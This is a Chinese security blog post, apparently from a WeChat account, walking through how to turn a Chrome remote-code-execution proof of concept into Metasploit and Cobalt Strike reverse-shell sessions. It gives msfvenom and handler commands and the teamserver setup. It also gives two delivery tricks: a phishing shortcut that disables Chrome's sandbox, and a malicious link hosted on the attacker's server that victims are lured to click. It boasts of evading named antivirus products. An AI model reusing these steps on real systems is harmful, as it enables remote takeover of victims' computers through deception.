欢迎关注公众号：24h进德修业。没有拿不到的权限，只有不努力的白帽。

实战Chrome RCE上线msf

msf生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=x.x.x.x  lport=4444 -f csharp

生成的shellcode如下

将poc用生成的shellcode进行修改

msf进行监听端口

msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => java/shell/reverse_tcpmsf5 exploit(multi/handler) > set lhost x.x.x.xlhost => x.x.x.xmsf5 exploit(multi/handler) > set lport 4444lport => 4444msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on x.x.x.x:4444

如下

这里提供两种漏洞利用的方式

第一种是快捷方式钓鱼的形式进行投马，构造payload

xxxChromeMyChrome.exe -no-sandbox file:///xxx/msf.html

如下

打开该快捷方式，漏洞利用

漏洞证明，msf已监听到会话

第二种利用方式

把用生成的shellcode进行修改的poc文件放到自己的公网服务器上，构造恶意链接诱导用户点击

构造恶意链接

http://x.x.x.x/msf.html

如下

关闭沙箱环境

第一种方式

设置Chrome浏览器的快捷方式

在快捷方式上增加  -no-sandbox

第二种方式

命令行命令

Chrome.exe -no-sandbox

如下

通过该快捷方式或命令行打开的chrome访问恶意url

漏洞证明，msf已监听到会话

实战Chrome RCE上线cs

执行命令

./teamserver x.x.x.x admin

新建一个https的名为chrome的cs的监听器

生成C语言的payload，选择Chrome监听器，记得勾选x64

获取到payload

将poc用生成的shellcode进行修改，取出 shellcode 部分替换   为 ,0 

这里提供两种漏洞利用的方式

第一种是快捷方式钓鱼的形式进行投马，构造payload

xxxChromeMyChrome.exe -no-sandbox file:///xxx/cs.html

如下

打开该快捷方式，漏洞利用

漏洞证明，cs已监听到会话

第二种利用方式

把用生成的shellcode进行修改的poc文件放到自己的公网服务器上，构造恶意链接诱导用户点击

构造恶意链接

http://x.x.x.x/cs.html

如下

关闭沙箱环境

第一种方式

设置Chrome浏览器的快捷方式

在快捷方式上增加  -no-sandbox

第二种方式

命令行命令

Chrome.exe -no-sandbox

如下

通过该快捷方式或命令行打开的chrome访问恶意url

漏洞证明，cs已监听到会话

最后总结一下，这种攻击方式只需要利用一个精心构造的url即可攻击成功，攻击过程中无新的进程创建

且无文件落地，即可获得计算机当前用户权限，并且火绒，腾讯电脑管家等软件均未告警

免责声明：本站提供的安全工具、程序、方法可能带有攻击性，仅供安全研究与教学之用，风险自负！本文部分内容来自网络，在此说明。

转载声明：著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

本文始发于微信公众号（24h进德修业）：全网最详细实战Chrome RCE上线msf和cs